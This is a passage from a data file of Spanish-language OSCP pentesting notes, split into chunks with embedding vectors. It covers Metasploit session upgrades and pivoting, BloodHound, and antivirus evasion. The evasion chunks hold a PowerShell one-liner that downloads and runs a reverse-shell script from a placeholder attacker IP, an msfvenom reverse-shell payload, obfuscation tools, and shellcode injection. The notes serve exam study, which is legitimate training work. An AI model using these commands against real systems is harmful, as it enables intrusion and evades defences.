-0.00261, -0.07469, -0.07259, 0.00811, 0.02278, 0.02281, -0.01446, -0.02711, -0.04791, -0.05503, 0.03321, 0.04863, -0.04732, -0.04425, -0.00963, -0.00365, -0.06575, 0.01249, -0.02114]} +{"tipo": "metodologia", "herramienta": "Metasploit", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "texto": "# Ctrl+Z para mandar la shell a background, luego:\nuse post/multi/manage/shell_to_meterpreter\nset SESSION 1 ; run\nsessions -i 2\n```", "v": [-0.03257, 0.04599, -0.21326, -0.1779, -0.1175, -0.13169, -0.15526, -0.088, 0.07461, -0.02725, -0.21696, 0.07795, 0.09108, -0.20562, 0.01534, 0.0097, -0.06636, -0.04222, -0.00054, 0.06191, 0.02789, 0.00586, -0.00683, -0.1081, -0.10616, 0.13544, 0.04343, -0.0032, -0.07357, -0.07772, -0.05648, -0.06796, 0.00084, -0.03538, -0.00475, -0.07938, -0.02786, 0.06982, -0.05783, 0.15416, -0.07926, 0.10436, -0.11115, 0.16989, 0.10577, -0.04396, 0.06056, 0.02877, -0.02671, -0.05671, 0.03229, 0.02476, -0.08438, 0.10926, 0.02133, -0.12705, 0.13642, -0.03114, -0.05639, -0.08428, -0.01114, 0.04786, -0.04245, 0.11949, 0.05666, -0.02299, 0.0929, -0.08327, -0.13074, 0.15145, -0.05179, -0.03378, -0.01775, -0.0115, 0.04381, 0.01986, -0.04355, -0.06669, 0.11391, 0.04189, -0.16371, -0.03328, -0.00038, 0.04668, -0.08023, -0.00302, 0.03289, -0.07467, -0.01752, 0.02341, 0.02359, -0.05151, 0.05504, -0.08122, 0.00619, -0.07302, -0.07682, 0.04297, 0.01669, 0.02313, 0.05336, 0.0233, -0.08514, 0.10798, -0.00373, 0.03229, 0.00895, -0.03975, 0.03495, 0.02195, 0.01789, -0.00218, 0.03082, 0.00348, -0.04969, -0.00594, -0.00215, -0.01384, 0.03481, -0.08726, -0.03369, -0.06425, -0.06844, 0.03642, -0.051, -0.04034, -0.02061, 0.04204, -0.00841, 0.00644, 0.03349, 0.02793, 0.00517, 0.02769, 0.01851, 0.0579, 0.04665, -0.00141, -0.03095, -0.07644, -0.04914, 0.13981, -0.01781, 0.03886, 0.03058, 0.07069, 0.01931, -0.07599, -0.02415, 0.03953, 0.12962, 0.00687, 0.01265, 0.0165, 0.03385, -0.09667, -0.01492, 0.04513, -0.03232, 0.0011, -0.04099, -0.02614, 0.03085, 0.07062, 0.00398, -0.05865, -0.02696, -0.04967, 0.00412, 0.01504, -0.00823, -0.00415, 0.03059, -0.07475, 0.04851, -0.07385, 0.06179, -0.05622, 0.05629, 0.01986, 0.087, -0.01026, 0.02027, 0.09774, 0.01274, -0.02122, -0.0228, 0.04619, 0.00348, 0.00112, 0.02548, 0.05867, -0.02498, -0.04653, -0.03412, 0.03175, 0.00367, -0.08576, -0.02198, -0.0286, -0.06232, 0.0527, 0.0025, -0.00786, 0.09308, 0.00647, -0.03692, 0.02898, 0.00663, 0.02056, 0.01601, 0.01984, 0.05828, 0.06214, -0.04251, 0.01522, 0.00213, 0.06924, 0.00927, 0.0057, 0.00256, 0.05713, -0.04411, 0.03492, 0.05245, 0.00319, 0.02336, -0.00836, 0.01217, 0.01469, -0.03611, 0.04061, 0.08027, -0.0026, -0.076, -0.02623, 0.03517, 0.0177, -0.02264, -0.00617, -0.01936, 0.05501, -0.01858, -0.03049, -0.06726, 0.00752, -0.05777, 0.04371, -0.00646, -0.0231, -0.06172, -0.06509, -0.041, -0.04903, 0.00765, -0.01706]} +{"tipo": "metodologia", "herramienta": "Metasploit", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "texto": "## Pivoting con Metasploit\n```\nuse post/multi/manage/autoroute\nset SESSION 1 ; set SUBNET 192.168.5.0 ; run\nuse auxiliary/server/socks_proxy ; run # + proxychains → Tunneling\nportfwd add -l 3389 -p 3389 -r 192.168.5.10\n```\n\nRelacionado: Buffer Overflow · Reverse shell · Reglas de herramientas · OSCP MOC", "v": [-0.06884, -0.12778, -0.22088, -0.18537, -0.05543, -0.12029, -0.01793, -0.10018, -0.01299, 0.0539, -0.15746, -0.07022, 0.03264, -0.0927, -0.01701, -0.08938, -0.13775, -0.02655, -0.03131, 0.00422, -0.05752, 0.01877, -0.04193, -0.07453, 0.08795, 0.24122, 0.05453, -0.0011, -0.06054, -0.08784, 0.01643, 0.0177, -0.00304, 0.06431, -0.08212, -0.1002, -0.05921, 0.09092, 0.03343, 0.12355, -0.05197, -0.0472, -0.18623, 0.1446, 0.13879, -0.10568, 0.05511, -0.07332, -0.04507, -0.03962, -0.0725, -0.09746, -0.13145, 0.12404, 0.00036, 0.01455, 0.14862, -0.01882, -0.08942, 0.02736, 0.03444, -0.02635, -0.08494, -0.10595, 0.03972, -0.04745, 0.00496, -0.06975, -0.16522, 0.08111, -0.04522, 0.0341, -0.04369, 0.01863, 0.10201, -0.02083, 0.0527, -0.00194, 0.11761, 0.03002, -0.11597, 0.00473, -0.03422, -0.0346, -0.04347, -0.04194, 0.03221, -0.11454, 0.06827, -0.04567, -0.00744, -0.02284, 0.03617, -0.07185, -0.00513, -0.0551, 0.03694, 0.04983, -0.00797, -0.08344, 0.09784, 0.04109, -0.0099, 0.07343, 0.01543, -0.00426, -0.01644, -0.06385, 0.04412, 0.04085, 0.07109, 0.02172, 0.08522, -0.05894, 0.03405, 0.01683, -0.02908, 0.06584, 0.08379, -0.02926, -0.0144, -0.0166, -0.01764, 0.0036, -0.00088, -0.05373, -0.04264, 0.05389, 0.06771, 0.01339, -0.01649, -0.01464, -0.14862, -0.06798, -0.07754, -0.0023, 0.06088, -0.01046, 0.01708, -0.0822, 0.03227, 0.00716, -0.02335, 0.01724, 0.05651, 0.04494, 0.00256, -0.00193, -0.02791, 0.03444, 0.02176, 0.02114, -0.02315, -0.01393, -0.00371, 0.00042, -0.01133, -0.084, -0.04176, 0.02571, 0.07665, 0.0184, 0.02017, 0.07342, 0.00029, -0.00792, -0.00447, 0.01052, -0.00797, -0.07456, 0.0396, 0.00336, -0.05841, -0.01957, -0.04928, -0.03621, -0.02403, -0.09783, -0.04292, 0.0033, 0.00023, -0.10248, 0.01132, 0.04712, 0.01801, -0.06318, 0.02144, -0.05947, 0.045, 0.03076, -0.00577, 0.01874, -0.05553, -0.00018, 0.06655, 0.02153, -0.03527, -0.13793, 0.00308, -0.00504, 0.0181, -0.0037, 0.00554, -0.0944, -0.02005, 0.04612, -0.03519, -0.03974, -0.0038, 0.0115, 0.03312, -0.09769, 0.03837, 0.04775, -0.02261, -0.00169, 0.04953, 0.01319, -0.04976, -0.06907, -0.02009, 0.06758, -0.01754, 0.0048, 0.0426, 0.00111, -0.00228, -0.02133, -0.02325, -0.03665, -0.03352, 0.02042, -0.00381, -0.05188, -0.04337, -0.03741, 0.04229, 0.01709, -0.02949, -0.05124, -9e-05, 0.03575, 0.00575, -0.04614, -0.02792, -0.01687, -0.02584, -0.02729, -0.00785, -0.05066, -0.08406, -0.0131, -0.05487, -0.08577, 0.04738, 0.00636]} +{"tipo": "metodologia", "herramienta": "AV evasion", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "texto": "# AV evasion\n\n> Cuando hay antivirus y tu payload muere al tocar disco. Fuente: oscp.trastero.org/avevasion.", "v": [0.11407, -0.0905, -0.19226, -0.03296, -0.06695, 0.11938, 0.01507, -0.0289, -0.07416, 0.10173, -0.00725, -0.22976, -0.00857, 0.20772, 0.09042, -0.11629, 0.1133, 0.03777, 0.05429, 0.03153, 0.00299, -0.03089, 8e-05, -0.00208, 0.07985, 0.08606, -0.1282, 0.04954, -0.17232, -0.12499, -0.01509, 0.00825, 0.06823, -0.06217, -0.02348, -0.07126, -0.03583, -0.01502, 0.1344, 0.14003, 0.04524, -0.01097, -0.07806, 0.12423, 0.01411, -0.11178, 0.01036, 0.05158, 0.0999, -0.00956, 0.04992, -0.01955, -0.07531, -0.07273, -0.05042, -0.02839, 0.03648, 0.01675, 0.16534, 0.10009, -0.0493, 0.16967, -0.07509, -0.03314, -0.00264, -0.01325, 0.06241, -0.12069, -0.00397, 0.05297, -0.06739, 0.06059, 0.09361, 0.05697, -0.02426, -0.19119, 0.03087, -0.03117, 0.0424, 0.07463, 0.00459, 0.00879, -0.01039, -0.01394, -0.14834, -0.04166, 0.0909, 0.03721, -0.01818, -0.05794, 0.04565, -0.03724, -0.09184, 0.07576, 0.00286, -0.03624, 0.0949, 0.0579, 0.04295, 0.01794, 0.06481, 0.03625, -0.02423, -0.01183, 0.03677, -0.00788, 0.04277, -0.06992, 0.029, 0.06718, 0.0675, 0.04687, 0.07548, -0.06189, -0.01865, -0.04216, 0.0905, -0.00474, -0.00661, 0.04738, -0.01942, 0.03243, -0.02875, -0.00115, 0.05116, -0.05875, 0.01089, 0.10375, -0.031, 0.01112, 0.0429, -0.06923, 0.0044, 0.01107, 0.05313, 0.00166, 0.05021, 0.03162, 0.01028, 0.00549, 0.09561, 0.00563, -0.03594, -0.00167, 0.04518, -0.0057, 0.05543, 0.02062, -0.05517, 0.02989, 0.0617, 0.09159, 0.00584, -0.03927, -0.00098, 0.01732, 0.06305, -0.02226, -0.05397, -0.02358, 0.04825, 0.12497, -0.01681, -0.05028, -0.05357, -0.00102, 0.05441, -0.02675, -0.00012, 0.08682, 0.00139, 0.00352, 0.00609, -0.09199, -0.01813, -0.13605, 0.03016, -0.10249, 0.0515, 0.01758, -0.01762, 0.00265, -0.04926, -0.00942, 0.05422, -0.0321, 0.0462, -0.00375, 0.01707, 0.07538, 0.06519, -0.00952, -0.10383, 0.0312, 0.01148, -0.08297, -0.02289, 0.01315, 0.03809, 0.02151, -0.0658, -0.04242, -0.02196, -0.01207, 0.04918, 0.02109, -0.01896, 0.00105, -0.01509, -0.0124, 0.10528, -0.01502, 0.03469, 0.02356, -0.01441, 0.04685, 0.02557, 0.01342, 0.0866, 0.04649, -0.06735, 0.04155, 0.07971, -0.01413, -0.04946, 0.04242, -0.00036, 0.04691, 0.08497, 0.01759, -0.00029, 0.03596, 0.05173, -0.05377, -0.00874, -0.01233, -0.03108, -0.02014, -0.03709, 0.02229, -0.01106, -0.06479, -0.03201, -0.08812, -0.00127, -0.02595, -0.01926, 0.02285, -0.00418, -0.05407, 0.00817, 0.00275, -0.02364, -0.01707, 0.01707, 0.02124]} +{"tipo": "metodologia", "herramienta": "AV evasion", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "texto": "## PowerShell en memoria (no toca disco)\n```powershell\nIEX (New-Object Net.WebClient).DownloadString('http://TU_IP/rev.ps1') # fileless\npowershell -ExecutionPolicy Bypass -File evasion.ps1\npowershell -encodedCommand JABjAG8AZABl... # comando en base64 (UTF-16LE)\n```", "v": [0.00799, -0.1823, -0.12289, -0.11187, 0.0489, -0.13284, 0.03634, -0.10788, -0.00092, 0.06004, -0.06283, 0.08326, -0.06411, -0.03006, -0.04766, 0.03518, -0.00865, -0.01524, -0.04623, -0.06517, -0.01657, 0.03715, -0.14606, -0.02794, 0.11374, 0.1724, -0.13901, 0.04954, -0.12155, -0.16594, 0.01355, -0.0527, -0.02211, -0.07234, -0.0192, 0.03933, -0.03279, 0.08481, 0.01875, 0.19462, 0.01872, 0.13419, -0.17492, 0.16407, 0.05701, -0.02412, 0.0721, -0.00888, 0.0848, -0.0713, -0.0476, -0.04717, -0.149, 0.05616, 0.04113, -0.15733, 0.13474, -0.05488, -0.04002, 0.02773, -0.06941, 0.05731, 0.01112, 0.01741, 0.04029, 0.0029, 0.0152, -0.15984, -0.08274, 0.08765, -0.11798, 0.06724, -0.01149, -0.08214, 0.05257, -0.04185, 0.04027, -0.06346, 0.09303, 0.07514, -0.07751, -0.02065, -0.09559, -0.02779, -0.09767, -0.00812, 0.04172, -0.08147, -0.07391, -0.0451, 0.08533, 0.01105, -0.04803, 0.09457, 0.05116, -0.03913, 0.03963, 0.08294, 0.07803, -0.00289, -0.01242, -0.02877, -0.06626, 0.05561, 0.12484, 0.00101, 0.02597, 0.00358, -0.03313, 0.04979, -0.01914, 0.0409, 0.04929, 0.00774, -0.02128, -0.03664, -0.05961, -0.05497, 0.02737, -0.06251, -0.07898, -0.02945, -0.00193, 0.0412, -0.03514, -0.02968, -0.03697, 0.07396, -0.01944, -0.0115, 0.00998, -0.01009, -0.00024, -0.00052, 0.00564, 0.08968, 0.01387, 0.03911, -0.03787, -0.0741, 0.11168, 0.05777, -0.04043, 0.08044, 0.07732, 0.06234, 0.05882, 0.03496, -0.08303, -0.00425, 0.07164, 0.08582, 0.03288, -0.00968, 0.0404, -0.01971, -0.01915, -0.05811, -0.04854, -0.03115, -0.04085, 0.0585, -0.00119, 0.06213, -0.01207, -0.0134, -0.01807, -0.00251, 0.01511, -0.05159, -0.00437, 0.02599, 0.00631, -0.05117, -0.0153, -0.11798, 0.02713, -0.05624, 0.03313, -0.06044, 0.01676, 0.00799, 0.04213, 0.04164, -0.0677, -0.05832, -0.00616, -0.07663, -0.05104, -0.04147, 0.05518, 0.03004, -0.05157, -0.06118, 0.01247, -0.02934, -0.06105, -0.01234, 0.03663, -0.0682, -0.07507, 0.00782, -0.04071, -0.01643, 3e-05, -0.00176, -0.00135, 0.02564, -0.08019, 0.00159, 0.0412, -0.01784, 0.03923, 0.00509, -0.04548, -0.04508, 0.04823, 0.02958, -0.03598, 0.00853, -0.01809, 0.01931, 0.06376, -0.00479, -0.00552, 0.03179, 0.01324, 0.02699, 0.05944, 0.00793, -0.0183, 0.0183, -0.06023, -0.05647, 0.02864, -0.06642, -0.05169, 0.05117, -0.07114, -0.02047, 0.01394, 0.00913, -0.04956, -0.07166, -0.09086, -0.11477, -0.03497, 0.03479, 0.04263, -0.01787, -0.04605, -0.02291, 0.02762, -0.03364, -0.0394, 0.01909]} +{"tipo": "metodologia", "herramienta": "AV evasion", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "texto": "## Generar y ofuscar\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f powershell -o sc.ps1 # → msfvenom\npython3 ps_encoder.py -s evasion.ps1 # darkoperator/Invoke-Obfuscation\n./chimera.sh -f evasion.ps1 -l 1,2,3 -o out.ps1 # Chimera: ofusca strings/variables\n```", "v": [0.21802, -0.27649, -0.07099, -0.0413, -0.03195, -0.17158, -0.04729, -0.22091, 0.05373, 0.07657, -0.0109, 0.11407, 0.03073, -0.03891, -0.0956, -0.0534, -0.02963, -0.01541, 0.02245, 0.01341, -0.03993, 0.06492, -0.18973, -0.11198, 0.07129, 0.17585, -0.10662, 0.0099, -0.18536, -0.16301, 0.01808, 0.02244, -0.01736, -0.048, -0.11545, -0.02009, -0.02314, 0.03961, 0.17449, 0.25574, 0.05749, 0.08642, -0.0151, 0.09499, 0.13991, -0.17031, -0.00336, 0.09222, 0.03105, -0.03545, -0.06125, -0.04545, -0.0546, 0.03947, 0.00512, -0.05241, 0.13979, -0.0226, -0.02213, -0.05355, -0.02178, 0.00984, -0.08189, -0.03343, 0.02346, -0.02025, 0.02979, -0.08253, -0.00465, 0.06799, -0.03998, 0.08218, -0.02603, -0.05153, 0.06287, -0.04818, -0.00917, -0.03672, 0.07886, 0.03647, -0.07516, -0.06401, -0.08949, 0.00441, 0.00128, -0.01452, 0.09042, -0.03155, 0.00864, -0.07596, 0.03491, 0.02286, -0.01687, 0.02379, 0.02047, -0.00223, -0.0151, 0.03277, 0.01454, -0.02396, -0.01104, 0.04023, -0.07184, 0.12181, 0.01195, -0.00759, -0.00427, 0.05147, -0.04963, 0.0381, 0.04859, 0.01202, 0.01369, -0.03078, -0.08155, -0.06449, -0.04046, -0.00827, 0.05598, -0.01396, -0.05395, -0.07561, -0.00941, 0.05335, -0.07325, 0.01924, -0.02834, 0.06377, -0.03271, 0.00206, 0.00361, -0.04087, -0.00061, 0.01406, -0.03248, 0.03421, -0.02889, 0.02167, 0.03526, -0.01911, 0.03984, 0.07732, 0.03898, 0.01021, 0.07921, 0.01923, 0.00552, -0.08677, -0.05897, 0.00666, 0.0607, 0.03183, 0.01053, -0.01322, 0.02469, 0.06016, -0.00437, -0.02521, -0.04064, 0.01965, -0.0008, 0.03848, -0.01865, 0.05162, 0.00526, -0.0522, 0.02143, -0.02753, 0.00256, -0.05739, -0.01899, -0.05519, 0.03436, -0.09673, -0.0103, -0.04298, 0.03633, -0.03756, -0.02752, -0.02147, -0.00472, 0.01646, -0.00547, 0.01809, -0.04689, -0.02296, 0.02334, -0.05244, -0.00974, -0.08237, 0.05477, 0.00427, -0.07111, -0.04759, -0.02001, -0.02855, -0.01651, -0.05876, 0.04201, -0.09074, 0.00564, 0.05391, 0.00862, -0.02946, -0.00441, -0.0063, -0.0248, -0.00392, -0.00507, -0.09769, 0.05437, -0.0073, 0.03484, 0.04583, 0.00039, -0.00154, -0.00031, 0.06221, -0.00075, 0.03021, -0.01492, 0.03434, 0.0131, 0.0249, 0.02346, -0.01268, 0.0718, 0.01849, 0.00116, -0.02811, -0.02951, 0.02251, 0.03805, -0.03483, -0.01483, -0.07661, 0.01055, 0.00165, -0.02795, 0.00244, -0.03452, -0.04153, -0.03653, -0.07749, -0.05718, -0.04418, -0.00684, 0.02701, -0.02943, 0.02558, -0.06433, -0.07742, -0.05549, -0.06129, -0.03464, 0.01476]} +{"tipo": "metodologia", "herramienta": "AV evasion", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "texto": "## Inyección directa (P/Invoke)\nScript PS que reserva memoria con **VirtualAlloc**, copia el shellcode y lanza **CreateThread** → ejecuta sin escribir un .exe al disco (evade el escaneo on-write).", "v": [-0.13202, -0.1208, -0.26777, -0.03116, 0.08486, -0.20242, 0.02038, -0.09435, 0.04434, -0.11191, -0.02015, -0.12616, 0.03962, -0.13194, 0.00023, -0.00756, 0.08906, 0.02523, 0.01904, 0.03921, -0.02528, -0.00364, -0.09702, 0.01019, 0.0203, 0.10275, -0.15835, 0.17643, -0.07215, -0.00448, -0.02488, 0.08507, 0.03649, -0.12628, 0.08149, 0.00661, 0.08798, -0.02723, 0.04943, 0.17914, 0.04138, 0.17286, -0.11423, 0.09028, -0.017, -0.06588, 0.18963, 0.087, 0.00389, 0.08428, -0.05177, 0.0098, -0.15973, 0.01037, 0.1039, 0.00086, 0.09198, -0.12812, -0.01947, 0.02145, -0.04034, 0.05802, 0.0368, -0.03984, 0.11409, 0.08188, 0.08079, -0.09367, -0.08279, 0.09192, -0.1081, 0.05956, 0.0004, -0.05198, 0.07265, -0.09951, -0.04786, -0.03318, -0.02553, 0.09004, -0.08956, -0.11974, -0.08375, -0.10278, -0.00928, -0.00405, -0.01367, -0.04134, -0.01492, -0.00617, 0.08837, -0.07261, -0.04402, 0.04695, 0.08686, -0.04561, 0.04038, 0.00908, 0.04877, 0.05847, 0.0403, 0.03676, -0.0324, 0.13949, 0.06548, 0.01112, -0.00936, 0.06719, 0.041, 0.04682, 0.05659, 0.00046, -0.05559, -0.00041, -0.08245, -0.04821, 0.03164, 0.06283, 0.07143, -0.00622, -0.01214, 0.00866, -0.06453, -0.00382, -0.00127, -0.01387, -0.06493, 0.02591, -0.071, 0.01783, -0.0449, 0.01428, 0.00771, -0.04789, -0.02233, 0.05152, 0.02226, 0.07131, 0.03715, -0.0735, 0.05277, 0.04178, -0.0391, 0.0097, -0.05616, 0.04033, -0.01437, -0.06416, -0.01556, 0.03096, 0.05399, 0.01537, -0.03411, 0.05655, -0.05109, -0.02669, -0.00685, -0.01886, -0.0657, 0.01382, -0.01568, 0.01145, -0.00247, 0.01803, -0.02026, -0.03286, -0.0516, -0.05059, -0.00118, 0.02201, -0.02442, -0.01622, 0.0277, -0.0908, 0.01807, -0.08637, -0.02906, -0.05541, 0.01434, 0.00571, -0.01176, -0.0261, -0.03484, 0.00789, -0.03321, -0.01832, 0.09423, 0.01568, -0.04911, 0.00812, 0.03389, 0.00121, 0.03811, -0.03938, -0.05204, -0.01842, -0.06086, -0.04933, 0.07903, -0.0064, -0.07627, 0.01714, -0.05909, -0.01995, 0.05497, 0.0202, -0.06901, 0.01856, -0.04882, -0.02178, -0.00598, -0.0273, -0.02448, 0.06361, 0.01364, 0.00871, -0.00111, 0.02323, 0.02138, 0.00377, -0.02525, 0.03675, 0.07297, -0.04934, -0.04295, -0.03193, 0.04672, -0.01553, 0.0233, 0.01352, -0.04716, -0.0001, -0.00313, -0.016, 0.04978, 0.04129, 0.01115, -0.03445, -0.043, -0.01284, 0.01439, 0.02612, -0.06436, -0.07042, -0.02694, -0.03461, -0.01997, 0.03757, -0.03918, -0.02695, -0.0014, -0.02417, -0.00812, -0.05471, 0.00755, 0.00349]} +{"tipo": "metodologia", "herramienta": "AV evasion", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "texto": "## Otras tools\n- **Shellter** (inyecta en un .exe legítimo), **Veil**, **Nim/C# loaders**.\n- **UPX** para empaquetar y cambiar la firma: `upx -9 rev.exe`.\n\n> Nota OSCP: la evasión de AV está permitida (no es un escáner de vulns prohibido → Reglas de herramientas); rara vez hace falta en el examen, pero alguna máquina la pide.\n\nRelacionado: Client-side attacks · msfvenom · Reverse shell · OSCP MOC", "v": [-0.11552, -0.12696, -0.182, -0.01292, 0.01272, -0.15076, -0.06941, 0.00681, -0.00258, -0.05504, -0.08626, -0.19719, 0.03408, -0.05309, 0.07164, 0.07048, -0.08579, -0.04404, 0.05302, 0.07525, -0.01822, -0.00179, -0.12183, 0.04463, 0.01258, 0.23648, -0.08942, -0.0031, -0.09542, -0.09755, 0.01832, 0.02768, 0.02179, -0.06665, -0.0378, -0.00094, -0.02776, -0.13487, 0.13433, 0.17484, 0.10381, 0.0923, -0.19741, 0.07909, 0.14932, -0.13441, 0.01663, 0.07992, -0.0002, 0.0215, -0.0456, -0.07706, -0.18943, 0.01238, 0.07402, -0.00209, 0.11952, -0.03144, 0.01146, -0.00516, -0.0115, 0.03058, -0.03366, -0.05701, 0.03585, 0.02951, -0.05985, -0.15359, -0.0878, 0.00847, -0.06468, 0.01606, 0.0048, -0.06029, 0.04267, -0.19623, -0.02544, -0.07963, 0.12233, 0.03411, -0.03201, -0.02462, -0.15988, -0.01456, -0.03003, -0.04959, 0.05377, -0.0481, -0.05359, -0.08603, 0.11702, 0.01561, 0.0151, -0.00075, 0.09478, -0.08439, 0.01546, 0.04246, -0.03856, 0.00088, 0.08473, 0.07659, -0.00248, 0.04403, -0.0605, -0.02753, 0.01355, -0.04845, 0.08734, 0.08368, 0.09581, 0.00226, -0.0209, -0.00922, -0.05539, -0.06436, -0.04833, -0.03679, -0.03721, -0.03029, -0.00353, -0.06773, 0.00385, 0.03937, -0.00427, -0.05603, -0.00697, 0.15975, -0.01424, -0.00065, 0.0015, -0.03058, -0.0118, -0.0325, -0.0571, 0.00726, 0.06754, 0.02797, 0.02675, -0.08207, 0.08198, 0.0653, -0.00497, 0.05033, 0.07902, 0.05313, -0.01781, -0.04487, -0.0382, -0.00724, 0.07269, 0.02339, 0.03083, 0.1094, -0.02338, -0.0075, 0.00818, 0.00657, -0.01348, 0.04762, -0.02543, -0.00357, 0.02797, 0.05062, -0.03496, 0.04056, -0.01302, -0.0271, 0.00685, 0.00083, -0.0177, -0.0279, 0.00591, -0.00715, 0.0013, -0.06138, -0.00319, -0.11427, 0.02713, -0.03384, -0.00405, -0.00363, 0.01391, 0.01572, -0.01731, -0.01415, 0.04941, 0.00134, 0.04968, 0.016, -0.00158, -0.01893, -0.04547, -0.05538, 0.04315, 0.01567, 0.0183, -0.05547, 0.04752, -0.00448, -0.03479, -0.0115, -0.03205, -0.0846, 0.02173, 0.01218, -0.0058, 0.00222, -0.04806, -0.02271, 0.02439, 0.00331, 0.04027, -0.00498, -0.04254, -0.04592, 0.03733, 0.05667, -0.02453, 0.01532, -0.00539, 0.02795, 0.05941, -0.01104, 0.0058, -0.025, 0.04346, -0.03339, 0.02342, 0.01809, -0.0081, -0.02265, 0.00511, -0.05495, 0.02899, 0.01124, 0.05423, -0.01555, -0.03363, -0.03892, 0.03781, 0.03772, 0.00529, -0.04836, -0.0456, -0.01171, -0.0152, -0.01664, 0.01127, -0.01682, -0.05828, -0.03183, 0.01449, -0.12408, 0.02285, 0.03134]} +{"tipo": "metodologia", "herramienta": "BloodHound", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "texto": "# BloodHound\n\n> Dibuja Active Directory **como un grafo**: nodos = usuarios/grupos/máquinas, aristas = relaciones. Le preguntas \"¿camino más corto de juan a Domain Admins?\" y te lo pinta. La única tool con GUI propia.", "v": [-0.18331, -0.02673, 0.009, -0.15788, -0.05581, -0.06508, -0.08465, 0.00191, -0.11262, 0.06328, 0.11845, -0.14409, -0.13003, -0.00192, 0.06135, -0.15542, 0.13368, -0.01521, -0.02599, -0.05755, -0.13167, 0.02619, -0.06053, -0.01282, -0.07494, -0.07204, 0.15805, -0.1004, -0.03721, 0.1794, 0.06023, -0.01467, 0.06061, -0.09878, -0.11647, -0.17814, 0.02962, 0.09173, 0.13877, 0.27999, -0.04693, -0.0344, -0.10817, -0.00374, 0.0171, -0.00511, -0.06166, -0.07199, -0.02935, 0.02703, -0.0676, -0.04849, -0.08611, 0.01482, -0.03132, -0.15006, 0.19056, -0.11935, 0.001, -0.12196, 0.02964, -0.04627, -0.0572, -0.03441, 0.00539, -0.00872, 0.0748, -0.07942, -0.00566, 0.07054, -0.02445, -0.00851, -0.03529, 0.06055, 0.09502, -0.06059, 0.035, -0.00289, 0.03773, 0.05071, 0.04808, 0.03229, 0.00486, -0.00872, -0.03083, -0.04215, -0.01875, -0.09494, -0.056, -0.03789, 0.12834, 0.00893, -0.04529, 0.01585, 0.0111, -0.01894, -0.02386, 0.00982, 0.08559, -0.06455, 0.04437, 0.0413, -0.10981, 0.1005, 0.11476, 0.0574, 0.01275, -0.00223, -0.05141, 0.09254, 0.11109, 0.01492, -0.03745, -0.0187, -0.04598, 0.06723, 0.02688, 0.0118, -0.00324, -0.08332, -0.04709, -0.04697, 0.03438, 0.03821, -0.09245, -0.06547, -0.00545, 0.08395, 0.00336, -0.00046, -0.07528, 0.04732, -0.00636, -0.111, -0.08377, 0.04113, 0.02672, 0.00701, 0.02001, -0.10162, -0.02993, 0.03792, -0.00229, -0.07315, 0.00016, 0.04438, 0.04834, -0.09856, 0.02912, 0.03233, -0.01434, -0.02879, 0.05552, 0.0073, 0.04527, 0.00645, -0.03092, -0.03183, -0.07454, -0.02588, -0.06182, -0.02012, 0.06418, 0.03269, -0.03792, 0.08926, -0.05851, -0.01495, -0.00797, 0.03639, 0.04723, 0.03005, 0.00934, 0.01065, 0.03805, -0.02076, 0.02149, -0.05216, -0.01063, -0.01127, 0.05915, 0.02225, 0.0187, 0.02736, -0.0311, -0.05447, 0.02203, -0.01274, 0.10099, -0.06203, 0.00297, 0.06538, 0.01407, -0.0247, 0.01366, 0.00276, 0.01489, -0.00465, -0.03475, -0.01977, 0.01144, 0.00695, -0.02666, 0.00258, 0.01696, 0.04761, -0.033, 0.02542, 0.0256, -0.01455, -0.02357, 0.01473, 0.0176, -0.02511, 0.00152, -0.04134, -0.03285, -0.01112, -0.00433, -0.00284, -0.04469, 0.06231, 0.03215, 0.00029, 0.05226, 0.05656, 0.02583, -0.01486, 0.04394, -0.00715, -0.01104, 0.01877, -0.01239, -0.04169, 0.0074, 0.01007, 0.0637, -0.03517, -0.02398, -0.02566, 0.04707, 0.04182, 0.02087, -0.03047, -0.07881, -0.04359, -0.00744, -0.02365, -0.05869, -0.02879, 0.00898, -0.04066, -0.00906, -0.01629, -0.00782, 0.02523]} +{"tipo": "metodologia", "herramienta": "BloodHound", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "texto": "## Componentes\n```\nSharpHound (.exe en víctima) o bloodhound-python (en Kali) → JSON\nJSON → BloodHound GUI (en Kali) + Neo4j (la BD del grafo)\n```", "v": [-0.31844, -0.15943, 0.02891, -0.03122, -0.07029, -0.19018, -0.03578, -0.01428, 0.04575, 0.01716, -0.00655, -0.07109, -0.07383, 0.04725, -0.02267, -0.03551, -0.03371, -0.09926, -0.07457, 0.08519, -0.14535, 0.11185, 0.0225, -0.05714, -0.00332, 0.1524, -0.02006, 0.11451, -0.10051, 0.04867, -0.01875, -0.13285, -0.0148, -0.03283, -0.11886, -0.08913, -0.05062, 0.07275, -0.03285, 0.2037, 0.04736, -0.0213, -0.02113, -0.07103, 0.00668, 0.05326, 0.02331, 0.11307, 0.07965, 0.06679, 0.04074, 0.05118, -0.22837, -0.06983, 0.05214, -0.15016, 0.1091, -0.08272, -0.00782, -0.10007, 0.00697, -0.04159, 0.02746, -0.10026, 0.02965, -0.05585, 0.06402, -0.06738, -0.02783, 0.09631, -0.04415, -0.00842, -0.05588, -0.05363, -0.05695, -0.11389, -0.02759, -0.06924, 0.15588, 0.08193, -0.00196, -0.00436, -0.08769, 0.0157, -0.08646, 0.04936, 0.10506, -0.01904, -0.04371, 0.0733, 0.12432, -0.08995, 0.0399, 0.07787, 0.09685, -0.04108, 0.05338, -0.03316, 0.0791, 0.01981, 0.11513, 0.06123, -0.07881, 0.06144, 0.06007, 0.00086, -0.0698, 0.0308, -0.05649, -0.04131, 0.05871, 0.05563, -0.0259, 0.05092, -0.0219, -0.0928, 0.05957, 0.04915, 0.01339, 0.00588, 0.04313, 0.00088, 0.03138, 0.0351, -0.10093, 